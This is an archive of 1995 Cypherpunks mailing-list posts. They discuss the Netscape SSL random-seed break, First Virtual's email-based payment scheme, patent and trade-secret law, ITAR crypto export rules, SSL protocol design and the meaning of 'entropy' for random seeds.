> > 2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600
> Hmmm...potential new crypto product...a "secure" newsreader with encrypted
> .newsrc? 

Why not write a shell script to decrypt you .newsrc, run your
reader then re-encrypt the .newsrc file ?

Why not do that for you mail address book file as well ?

Hey, this is cypher-punks- DIY :)

--
Salvatore Denaro		
sal@panix.com             I waited for the joke/It never did arrive.
Yes, I use PGP         Words I thought I'd choke/I hardly recognize.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 20 Sep 95 14:28:37 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping)
In-Reply-To: <v02120d1aac85dff6bc68@[199.0.65.105]>
Message-ID: <9509202127.AA07988@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga writes:
 > --- begin forwarded text
[...]
 > Date: Wed, 20 Sep 1995 10:47:24 -0400 (EDT)
 > From: Nathaniel Borenstein <nsb@nsb.fv.com>
 > To: www-buyinfo@allegra.att.com
 > Subject: Re: Security Flaw Is Discovered In Software Used in Shopping
 > 
[...]
 > For information on a safe, non-cryptographic alternative that has been
 > fully operational for nearly a year, with over 30,000 paying customers,
 > a growth rate featuring a six week doubling period, and NO break-ins to
 > date, check out http://www.fv.com.  -- Nathaniel
After some research on the above advertised site : 
"
   If you can talk to FIRST VIRTUAL via electronic mail, and nobody
   else can read or reply to your E-mail, then your E-mail account is
   compatible with FIRST VIRTUAL.
"
Wonderfull, this makes about ***nobody***
Are those folks stupid enough to think that using clear text mail is
something resonnable !!! better use even netscape 1.1 export !
(basically their 'trick' is that you send your CC# by phone, they then
give you an "id" by clear text EMAIL that allows you to shop (you and
all the folks that can intercept your mails) shopping are confirmed by
sending you a clear (!) mail, that you need to answer with "YES" "NO"
or "FRAUD" (!!) very funny system.... I imagine the poor fooled
customer bills...  Probably a lawyer devised te above statement so if
ppl get charged with thing they didn't asked for, fir$t virtual will
answer they were at fault because "someone" can read their mail (even if
the someone is the hacker around FV's mail exchanger...)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Legion of Doom Kennedy Qaddafi security break North Korea DST




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Wed, 20 Sep 95 23:52:44 PDT
To: cypherpunks@toad.com
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <199509210637.XAA11478@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


> But don't they have to put something on the patent application?  Can they
> claim trade secret status for something that was on a patent application,
> but rejected?  That seems like they're getting it both ways. 

At this point, in this country, a patent is secret until it is issued.
It is interesting to note that the process of issuing a patent can
take an indefinite period, and to some extent it is in the control of
the person seeking the patent.  The typical slimy thing to do is
to file for a patent, and keep it a trade secret too.   Delay the
issuance until somebody discovers your secret, then allow the patent
to be issued.  This is called a "submarine" patent.  It allows
the best of both worlds, and extends the patent as far in to the
future as possible (17 years from issue date, in this country,
regardless of filing date).

You can delay the patent's issuance by continuing to file amendments
to it.  Gilbert Hyatt's recent patent on microprocessors is the
classic example.

Now, this is all expected to change, to become more harmonious
with the rest of the world.  The changes that I've heard are
1) Go to first-to-file instead of first-to-invent
2) Life is 20 years from filing date, instead of 17 years from issue date
3) Publicize patents some fixed time from filing date, say 1 year

As you can imagine there are armies of lawyers on both sides of the
issue, so I don't think that you'll see any changes in the law any
time soon, but you never know.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 20 Sep 95 23:44:38 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: netscape's response (source code review)
In-Reply-To: <199509202028.NAA06925@comsec.com>
Message-ID: <9509210644.AA09480@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> > "Netscape has also begun to engage an external group of world-class
> > security experts who will review our solution to this problem before
> > it is sent to customers."
> > 	A group which offered to review the first version, but
> > Netscape refused.
>   Do you mean that cypherpunks offered to review the netscape code
> if only we made all the source available on the net?

I think "the group" was RSADSI, based on a remark of Jim Bidzos.
However, I do think that, like the S1 cipher, your code would get
examined for interesting features and flaws by the cypherpunks if you
released it.

>   We will be having at least some of our code reviewed by a
> wider audience, but I don't yet know which code, or how wide a review
> group.  If anyone has specific suggestions for pieces of code that
> you would like to see widely reviewed (such as RNG and seed generation)
> let me know.

It is becoming gradually clearer in cryptanalysis that you can't test
security of pieces in isolation.  Their interaction with the
surrounding code and protocols is key to their security.  Ross
Anderson's paper at Crypto last month was all about this (``Robustness
Principles for Public Key Protocols'').  There were also several
papers there that showed how you couldn't just treat hash functions
like MD5 as black boxes, since embedding them naively into signature
protocols made it possible to do things like turn a signed short
message into a signed longer (modified!) message.

So far the c'punks haven't done anything clever to your protocols;
they've exploited basic weaknesses in key length and key generation.
There's still a lot of potential in active attacks, three-cornered
attacks, replays, etc, that is unexplored.

>   I realize that some cypherpunks think that we should make all of
> our code publicly available.  In an ideal world that would be great,
> but we live in a world with politicians, crooks, lawyers, stockholders,
> etc...  Don't expect to see us posting our entire security
> library source code to cypherpunks.

Naah.  I think NCSA should've made Mosaic publicly available, because
they wrote it with our tax dollars.  And I hold it against them that
they started the trend of "zero-cost personal-use binaries but no
commercial use" that many Net users still confuse with Real Free
Software (free as in freedom).  But Netscape owns its code, it can do
whatever it wants with it.

I'd still encourage you to err on the side of release.

The strongest tendency in the security industry is for "security by
obscurity", i.e. if we just keep this quiet, nobody will figure it
out.  Customers, even less sophisticated than vendors, often let the
vendors get away with it.  But it doesn't stop the crooks, and
stopping the crooks is what your customers are paying you to do.  

Code that gets public scrutiny, like published scientific papers, gets
debunked and honed and made to really work.  Much faster than code and
ideas that only circulate in small, closed groups.  The reason
Kerberos V5 is a lot more secure than V4 is because its security
features and flaws could be publicly discussed.  Steve Bellovin wrote
a whole paper about what was wrong in V4, and lots of people got to
chew on that and think about how to fix it.

The question that only Netscape management can estimate is: what
damage would it risk to your business, if you released *this much*
crypto code instead of *that much*.  Particularly if you copyright it
and prevent commercial re-use without licensing, I doubt it will help
your competitors much.  There is the risk of revealing a flaw that makes
it easy to crack.  That has to be balanced against the risk of having
such a flaw and not noticing it for years.

And finally, I thought a marketing goal was to make your security
scheme (SSL) a standard throughout the industry?  In that case,
publishing it *and allowing* commercial use would encourage people to
adopt it -- which is what I think you want.

[We all realize that "publishing" crypto code is unconstitutionally
regulated by the State Department.  So there are logistics to the
release process.  But you are presumably solving them for the 128-bit
domestic version; you can use the same procedures to let people
download whatever crypto source code you release.]

	John Gilmore





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 20:49:58 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: /dev/random for Linux
In-Reply-To: <199509210319.UAA04352@goblin.punk.net>
Message-ID: <199509210349.XAA06110@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Simmons writes:
> > On this same track, I suggest that "/dev/random" devices for unix are
> > an excellent idea. Ted Tso did one for Linux that steals all the bits
> > of semi-random timing information it can.
>
> Anyone know where I can find more information on this wonderful device?

I'd ask him. tytso@mit.edu. I've cc'ed him on the mail.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Wed, 20 Sep 95 22:55:00 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Entropy vs Random Bits
Message-ID: <3060FDCD@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



I've been watching the debate and discussion unfold on usable sources of 
random data from environments, user actions, etc.  I have a vocabulary 
question (and something of a bone to pick as a mathematician and physicist). 


Usually, the term "entropy" is being used to characterize one of two 
different things: (i) random data, as in "300 bits of entropy," and (ii) the 
"randomness" of data (i.e. high degree of variance in a statistic drawn from 
it), as in "you can find a lot of entropy in the low order bits of a timed 
interval between keystrokes."  I suspect that there are other shades of 
meaning intended in other uses as well.

This is odd.  The term entropy describes an aspect of thermodynamic 
equlibrium in physical systems.  Although sometimes used as a synonym for 
"random," that definition is vernacular, not technical.  In fact, there is 
no meaningful relationship between "entropy" and random data of the type 
described in the postings related to seed values.  In the presense of a 
perfectly suitable and precise mathematical term (i.e. random), why invent 
new terms?  Why use them to mean at least two different things?

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Wed, 20 Sep 95 23:23:30 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: Patents and trade secrets
Message-ID: <3061045B@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



> > Many technologies have both patented parts and trade secret parts. 
 Often,
> > companies will maintain information that is in patent applications as 
trade
> > secret until they are granted.  I guess I should say _if_ they are 
granted!
>
> But don't they have to put something on the patent application?  Can they
> claim trade secret status for something that was on a patent application,
> but rejected?  That seems like they're getting it both ways.  They should
> probably have to choose whther or not they want to show anyone their
> "secret".  If not, it stays a trade secret.  If so, it's not a secret 
anymore,
> and they hope it's "nonobvious, etc." enough to be granted a patent.

Sure, they have to put their "best mode" of performing their invention into 
the patent application.  While the patent is pending (at least in the US), 
the patent application is confidential, so if the patent is denied, or if 
the patent is not as broad as the inventor would have liked, they can 
withdraw the application without the information contained in it ever 
becoming public.  In Europe, publication occurs automatically after 18 
months, so the inventor has less time there to make a go/no go decision, but 
they can still do it.

In some respects, the existing system gives you most of what you want -- if 
you can't get patent protection for an idea, you can fall back on trade 
secret protection (which you didn't have to give up just to try to get a 
patent).  It seems pretty harsh to me that just making a stab at getting a 
patent would mean that all of your hard work could just slip away into the 
public domain if it wasn't quite up to snuff.  Sure would make me swallow 
hard....

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@santafe.edu (Nelson Minar)
Date: Wed, 20 Sep 95 23:32:31 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape is doing well -- give 'em a break.
In-Reply-To: <199509202041.NAA07036@comsec.com>
Message-ID: <9509210631.AA18308@sfi.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Netscape is to be commended for even *putting* crypto into their product!

I'm impressed with the way Netscape has responded to recent
events. It's refreshing to see a company say "yes, we made a mistake
in our security software" rather than pretend there's no problem.
Word Perfect encryption, anyone?

>Cygnus' Kerberos faced the same random-seed problems and punted in
>similar ways.

Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had
the same problem: the random seed was based on the current time to the
microsecond, modulo the granularity of the system clock. I think I
figured that on my hardware, if I could figure out which minute the X
server started (easy with finger), I'd only have to try a few
thousand keys or so. Caveat: I never actually proved the idea.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 21 Sep 95 00:37:26 PDT
To: iang@cs.berkeley.edu
Subject: Export via FTP: who's to blame?  Ask a court!
In-Reply-To: <43qvn4$mm@calum.csclub.uwaterloo.ca>
Message-ID: <9509210737.AA10902@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> (ITAR yadda), but even so, if JRFurriner downloads
> crypto from company C's site in the US, who's guilty of ITAR-violation?
> Company C for making it available, or JRF for initiating the action
> that caused the bits to be send out of the country?

This is a question that has never been answered by a court.

Personally I think that the Congress can't constitutionally set up a
scheme that restricts US citizens from communicating with each other
to transfer software.  Even if it makes it harder to catch foreigners
who break the law.  Prior restraints on US citizens' communications
can only be done if they are "incidental" to a greater government
purpose.  When their purpose is to restrain the act of communication
itself, they lose.  It's even clear that they can't prevent US
citizens from communicating with foreigners, so the entire crypto
software export regime may be unconstitutional.  The more research we
do on the First Amendment law, the more it looks this way to me.

If some hardy soul wants to set up a nice clean situation, like Phil
Karn did for the paper-vs-magnetic-media distinction, I'm sure we can
find some more pro-bono (zero cost) lawyers who'll take the case for
the fun and notoriety.  You don't have to break the law to get into
court; Phil didn't, for example.  You make a situation where the law
restricts you, then sue to have the restriction declared invalid.  And
if you have ever been in court, it's a lot more fun being the
Plaintiff than being the Defendant.

Doing this will take significant time on your part.  Even if the
lawyers do 95% of the work, you have to talk with them, review what
they write, explain the details in gory detail, and believe in what
they're doing for you.  And sometimes do things in a way that they are
sure is right, even though you yourself aren't sure.  And stick with
the case even though it would drag on for years through several
courts.  So it's not something to do lightly.  But it's worth it.  And
it's a lot safer and easier to enforce your civil rights now, than to
try to live through the civil war that would follow the slide into
authoritarian government.

I'd do this case myself, except that I think we should have few single
points of failure.  If we spread the work around, it's more likely to
happen.  And your civil rights are safer, because you yourself have
learned how to defend them.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Wed, 20 Sep 95 23:43:44 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Re: Patents and trade secrets
Message-ID: <3061091A@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



>> After a patent is granted, it is usually a good idea to also maintain 
some
>>trade secrets in your products -- since trade secrets never "expire," 
unlike
>>patents.  If the patent isn't granted, you still have the option of 
treating
>>the contents as an intellectual property under trade secret protection.
>
>Rubish, disclosure is required for a grant of a patent. Unless someone
>skilled in the art can duplicate the invention from the patent claim
>you don't get a patent issued.

Sure disclosure is required.  There is no requirement; however, that an 
invention be your _whole_ product.  For example, most automobiles have 
thousands of patents involved in their creation.  It is entirely possible, 
even commonplace, as I said in my mail, that one or more portions of a 
product represent practice of patented inventions, and one or more _other_ 
portions represent trade secrets.

>Trade secret protection is very tricky in any case. Its practically
>useless if you want to protect a product rather than a procedure.

That depends.  Obviously, trade secret protection can be very effective for 
processes involved in manufacturing physical goods.  In software, it depends 
on whether what you are treating as a secret becomes widely known (after 
which, self-evidently, it is no longer a secret!)  For example, if one where 
to keep the mathematics behind MD5 a trade secret, it is plausible that it 
would never be "figured out" just from examining object code that implements 
the algorithm.  It doesn't matter if it theoretically could be done, just 
that it hasn't actually happened.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Thu, 21 Sep 95 01:07:51 PDT
To: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Subject: Re: Please send me SSL problems...
In-Reply-To: <v02110104ac85a804545b@[204.179.132.1]>
Message-ID: <9509210104.ZM154@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20,  4:35am, "Erik E. Fair"  (Time Keeper) wrote:
> Subject: Re: Please send me SSL problems...

> Jeff, the SSL specification has a severe *architectural* problem - it
> assumes that Internet Protocols are APIs - interface standards, and that
> you can just slide a "layer" underneath without anyone noticing. Such is
> not the case - all the Internet Protocols are real protocol standards, in
> that they specify the syntax, order, and semantics of the actual bits on
> the wire. The IETF quite explicitly doesn't care about APIs - that's a host
> software issue, and it doesn't matter what the host software looks like (or
> even what the machine looks like), so long as it gets the bits on the wire
> right, according to the protocol spec. This is how the Internet can make
> very strong guarantees about interoperability.
>
> You can't fiddle with a communication protocol without getting agreement
> from everyone about the change, or extend it in a way that is compatible
> with the protocol you're modifying, on a per-protocol basis (e.g. adding a
> TELNET negotiation option to TELNET for encryption, an FTP command to FTP,
> etc). Otherwise, all you've done is made a private, non-interoperable
> change to an existing protocol that guarantees interoperability *failures*
> between systems that implement the existing specification, versus your own
> version of HTTP, or TELNET, or whatever. In short, the SSL specification,
> as written, proposes to change all Internet application protocols, globally
> - "slide in a layer." That's not how it's done, and it's not the right
> place to do it, even if it appears to work in an enclave of systems.

  My view of SSL is that it should not generally be considered a transparent
layer that can be plugged in below any application.  I don't consider
HTTP on top of SSL to be the same as HTTP, or something that can totally
replace HTTP.  Thats why we use a different port and call it https: and not
http. I think using TELNET and FTP as examples of protocols that can be
transparently layered on top of SSL was unfortunate.  I've looked at
what it takes to make some existing protocols work with SSL, and I'm not
convinced that its always appropriate.  For example FTP and RCMD use
multiple connections, which is a royal pain.

  It seems that the thing you are objecting to is the wording in the
spec, in the "motivation" section, that appears to suggest that the
entire internet could run on top of SSL.  I think that section of the
spec could just be chopped out, and SSL would still be useful today
without pretentions of world domination.

  If a secure IP standard emerges that is widely deployed and provides
similar services, I don't see why SSL couldn't just go away (this is my
opinion, not an official position of netscape).

  This was sort of off the top of my head.  I've not spent long hours
contemplating these questions...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Thu, 21 Sep 95 01:22:18 PDT
To: Eric Young <fair@clock.org>
Subject: Re: Please send me SSL problems...
In-Reply-To: <Pine.SOL.3.91.950921150731.23836F-100000@orb>
Message-ID: <9509210118.ZM154@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


  I don't think that the API that SSLRef export is not particularly interesting.
We have no attachment to that API.  I would expect someone who gets SSLRef
to rework the API to suit their application.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Thu, 21 Sep 95 00:25:01 PDT
To: jamesd <jamesd@echeque.com>
Subject: Re: Entropy vs Random Bits
Message-ID: <306112E3@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



>Your use of the word random is incorrect:  The throw of a dice is
>random, but only contains 2.6 bits of entropy.

The throw isn't random, the data read from the die after it is thrown is 
random.  The use of the term in many of the postings I have read indicate 
the need for an "unpredictable" quantity in most cases.  This quantity may 
be drawn from a source that has entropy, but it is random.

>> why invent new terms?  Why use them to mean at least two different 
things?

>This is old term of the art, a term of information theory:  We use
>the same word because entropy in information theory has the same
>measure as entropy in thermodynamics.
>
>In both cases the entropy, measured in bits, of an ensemble of
>possible states is sum of  - P(i) * lg[P(i)] over all the possible states.

In thermodynamics, counting states in this fashion is a dicey proposition, 
but I appreciate the clarification.  Still, it seems to me that the property 
"bits of entropy" is often substituted for the actual "bits of random data" 
and is just as puzzling as gathering the "entropy of cool steam"!  One can't 
_do_ anything with a dimensionless measurement.  By which I mean, the 
measure of a property of data is not the data itself, so it still seems like 
the usage is odd, at times.  However, your explanation does address some of 
the phrases I have seen.

Does this mean that entropy is conserved in information theory?

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Wed, 20 Sep 95 20:46:12 PDT
To: liberty@gate.net (Jim Ray)
Subject: Re: MIME
In-Reply-To: <199509201253.IAA21521@tequesta.gate.net>
Message-ID: <m0svaN4-000DPeC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> >I think that it must be the content-type that is causing problems,
> 
> Yes, I agree. Make it something like ASCII text

But it's not text/plain.  It's PGP'ed text/plain.  The only way to
indicate this in MIME is with a content-type.  (Yes, they're working on
a general way to encapsulate encryption.)

Fine, I'll just leave mail to the list unsigned.
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "starrd@iia2.org" <starrd@starrd>
Date: Wed, 20 Sep 95 22:55:31 PDT
To: owner-cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <QQzibu08195.199509210130@relay3.UU.NET>
Message-ID: <Pine.BSD.3.91.950921012443.7792C-100000@maxwell.iia2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Sep 1995 owner-cypherpunks@toad.com wrote:
>                                   (    \
> Finger for public key               \   )
> Strong-arm for secret key             /    <--  minor groove
> Thumb-screws for pass-phrase        /   )
> 
> 

I love your phrase, I hope you don't mind...I added it to my .sig.  :)

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Finger for PGP public key, strong-arm for secret key, thumbscrews for
passphrase...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 22:32:57 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Hold a Cracking Party
In-Reply-To: <199509201812.OAA28709@panix.com>
Message-ID: <43qtdn$jbu@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509201812.OAA28709@panix.com>,
Duncan Frissell  <frissell@panix.com> wrote:
>
>"Anyone know any publications interested in an article on the Crack?"
>
<SARCASM>
How many more can there be?  I must have given interviews to a large
percentage of them by now. :-)  Luckily, it's starting to subside.
I actually had almost a whole hour today during which nobody called.
</SARCASM>

Was it like this for Damien?

   - Ian "whose brain melted after Monday's deluge"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 22:36:19 PDT
To: cypherpunks@toad.com
Subject: Re: Munitions shirt (again)
In-Reply-To: <ac85a2df3002100408ee@[205.199.118.202]>
Message-ID: <43qtjt$kch@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <ac85a2df3002100408ee@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
>
>Ian did great work on the latest Netscape break, but this is just plain crazy.
>
Just some random thoughts while my brain is goo... :-)

   - Ian "that, and I'm trying to figure out your country's legal system..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 20 Sep 95 22:36:42 PDT
To: cypherpunks@toad.com
Subject: What's with the list? (Old mail?!)
Message-ID: <199509210536.BAA17421@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



Anyone else get old c'punks postings remailed to them from August?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Randy Catoe <Randy@mci.net>
Date: Wed, 20 Sep 95 22:38:24 PDT
To: cypherpunks@toad.com
Subject: Re: USA Today on Fear of Credit Cards over Net
Message-ID: <01HVIQUUZ6HU8WX6TO@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 07:35 PM 9/20/95 -0400, Perry E. Metzger wrote:
>
>Re: The risk of credit cards.
>
>I suppose that indeed there are large risks elsewhere in the credit
>card system. However, I think that the credit card system itself is
>stupid and insecure and ought to be scrapped -- sending around account
>numbers as magic keys to get payment is a stupid move. Its not
>suprising how large credit card fraud is.
>
>One of the great hopes I have for cryptographic technology is its
>ability to lower the incidence of fraud, and thus lower transaction
>costs a lot. Someday, hopefully, everyone will be able to be a credit
>card merchant because you won't have to trust the merchants not to
>steal.
>
>Perry
>
>
I'm told that the revenue lost to fraud in the
credit card industry is around .15 percent of the gross purchase value.

I'm also told that the credit card companies actually face higher costs
from disputes, i.e. when you call them up and busy out a person to 
resolve a question on you bill. 

Randy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 20 Sep 95 22:43:20 PDT
To: cypherpunks@toad.com
Subject: Re: Please send me SSL problems...
In-Reply-To: <9509201715.AA19393@sulphur.osf.org>
Message-ID: <9509210543.AA02352@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz <rsalz@osf.org> writes

>I've heard that Digital, HP, and IBM have all mandated that all security
>code (except keymgmt and other things that are out of scope) must go
>through the GSSAPI:  no writing your own stuff.  I heard, less
>authoritatively, that Microsoft has the same rules, except they use a
>FunnyLookingVariant(far) of an earlier GSSAPI draft.

None of these organisations have mentioned GSSAPI to me.

Do you have a source?


David Van Wie <dvw@hamachi.epr.com> writes

>Many technologies have both patented parts and trade >secret parts.  Often, 
>companies will maintain information that is in patent applications as trade 
>secret until they are granted.  I guess I should say _if_ they are granted! 
> After a patent is granted, it is usually a good idea to also maintain some 
>trade secrets in your products -- since trade secrets never "expire," unlike 
>patents.  If the patent isn't granted, you still have the option of treating 
>the contents as an intellectual property under trade secret protection.

Rubish, disclosure is required for a grant of a patent. Unless someone 
skilled in the art can duplicate the invention from the patent claim
you don't get a patent issued.

Trade secret protection is very tricky in any case. Its practically
useless if you want to protect a product rather than a procedure.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 22:47:57 PDT
To: cypherpunks@toad.com
Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft (fwd)
In-Reply-To: <3060D3B3@hamachi>
Message-ID: <43qu9q$nbd@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <3060D3B3@hamachi>, David Van Wie  <dvw@hamachi.epr.com> wrote:
>
>David Clavadetscher of PrivaSoft writes:
>> At this time our crypto engine is patented and proprietary.
>
>Ian Goldberg writes:
>> Waitasec...  I was under the impression that if you patented it, you had 
>to
>> reveal it.  That's why RC4 isn't patented (it used to be a trade secret).
>
>Many technologies have both patented parts and trade secret parts.  Often, 
>companies will maintain information that is in patent applications as trade 
>secret until they are granted.  I guess I should say _if_ they are granted! 

But don't they have to put something on the patent application?  Can they
claim trade secret status for something that was on a patent application,
but rejected?  That seems like they're getting it both ways.  They should
probably have to choose whther or not they want to show anyone their
"secret".  If not, it stays a trade secret.  If so, it's not a secret anymore,
and they hope it's "nonobvious, etc." enough to be granted a patent.

   - Ian "I heard that 'x*y=[(x+y)/2]^2 - [(x-y)/2]^2' is a patented way
		   to multiply numbers of the same parity.  Can anyone verify this
		   and/or produce a reference?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 20 Sep 95 23:02:49 PDT
To: cypherpunks@toad.com
Subject: Re: Euro-Clipper
In-Reply-To: <199509210102.SAA15389@cory.EECS.Berkeley.EDU>
Message-ID: <9509210602.AA02445@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



> It relates that the policy was approved on the 8th September at
> Strasbourg by the Council, and coincides with an attempt by the
> European Commission to propose a pan-European encryption standard. The
> Council - unlike the Commission - has no statutory powers to enforce
> its recommendations. However, Peter Csonka, the chairman of the
> committee that drafted the document (and an administrative officer at
> the Council's division of crime problems) says that `it is rare for
> countries to reject Council of Europe recommendations'.

It may be rare for a council of Europe recommendation to be rejected
but that is because they can be ignored. Actually the Dutch have
completely ignored the edicts concerning Drugs, the British routinely
ignore anything they don't like in the EU where there is a 
parliamentary element. Don't expect them to snap to attention 
at the council of Europe.

Until there is a law actually passed in the UK there is no 
change in the status quo, same for the other european countries.

> I for one will be making clear to my MP that his stand on this issue
> will determine how I cast my ballot at the next election.

So you would rather have a Tory government plus a promise to permit
crypto than a Labour government plus a promise to repeal the 
criminal justice act? Be real, even the freedom issue alone there
are other factors to weigh in the balance. Plus any Tory promise
would have to be considered as trustworthy as their line at the
last election on taxes.

I can possibly see a choice between LibDem and Labour on this 
issue alone, I don't think that many people will consider it
the major issue at the next election though.

On the other hand you might be able to influence a person
looking to become a candidate in a consitituency. One vote
on a selection committee can make a big difference. 

In other words if you want to make cryptography an issue you
will have to hack it at the party level.


	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 23:03:56 PDT
To: cypherpunks@toad.com
Subject: [NOISE] "hacker" was: first virtual "security"
In-Reply-To: <v02120d1aac85dff6bc68@[199.0.65.105]>
Message-ID: <43qv7h$qog@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <0kMA2EqMc50eMEb4Yx@nsb.fv.com>,
Nathaniel Borenstein  <nsb@nsb.fv.com> wrote:
>If an SSL-like scheme were in wide use world-wide, the hacker who just
>made a name for himself by breaking SSL could instead have gone down in

Ugh.  That word again.  I'm only 22, but I'm old enough to remember
when there were people called "crackers", and being called a "hacker"
was a _good_ thing.

I know at least one article about the break went, "Two hackers in
Berkeley, California...".

We actually got questions from reporters asking why we didn't just use
our newly-found hole to snoop financial transactions.  I've done a lot
of root-breaking in my (short) time, but I work for the Good Guys (TM).

  - Ian "hey, I warned you it was noise"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 23:12:00 PDT
To: cypherpunks@toad.com
Subject: Re: FROM A FRIEND . . .
In-Reply-To: <199509201648.MAA14624@panix.com>
Message-ID: <43qvn4$mm@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <43qrhf$gd5@tera.mcom.com>,
Jeff Weinstein <jsw@neon.netscape.com> wrote:
>  I think that the general opinion of engineers and management here at
>Netscape is that it would be A Really Good Thing to have our US-only
>128+ bit version of Netscape Navigator available for download by US
>citizens and others who are not legally prohibited from using it.

